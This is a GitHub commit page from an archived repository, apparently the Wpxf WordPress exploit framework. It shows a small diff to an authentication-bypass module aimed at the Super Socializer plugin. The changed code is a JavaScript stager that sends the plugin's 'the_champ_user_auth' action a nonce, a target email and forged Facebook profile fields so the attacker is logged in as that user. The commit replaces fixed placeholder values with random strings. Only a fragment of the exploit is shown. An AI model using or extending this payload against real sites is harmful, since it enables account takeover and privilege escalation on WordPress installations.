Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 1ef261c

Browse files
committed
Replace static data with random strings
1 parent 2170822 commit 1ef261c

File tree

1 file changed

+5
-5
lines changed

1 file changed

+5
-5
lines changed

modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -56,12 +56,12 @@ def stager
5656
var param = {
5757
action: 'the_champ_user_auth',
5858
security: nonce,
59-
'profileData[id]': 'a',
60-
'profileData[link]': 'a',
61-
'profileData[name]': 'a',
59+
'profileData[id]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
60+
'profileData[link]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
61+
'profileData[name]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
6262
'profileData[email]': email,
63-
'profileData[first_name]': 'a',
64-
'profileData[last_name]': 'a',
63+
'profileData[first_name]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
64+
'profileData[last_name]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
6565
provider: 'facebook',
6666
redirectionUrl: encodeURI(url)
6767
};

0 commit comments

Comments
 (0)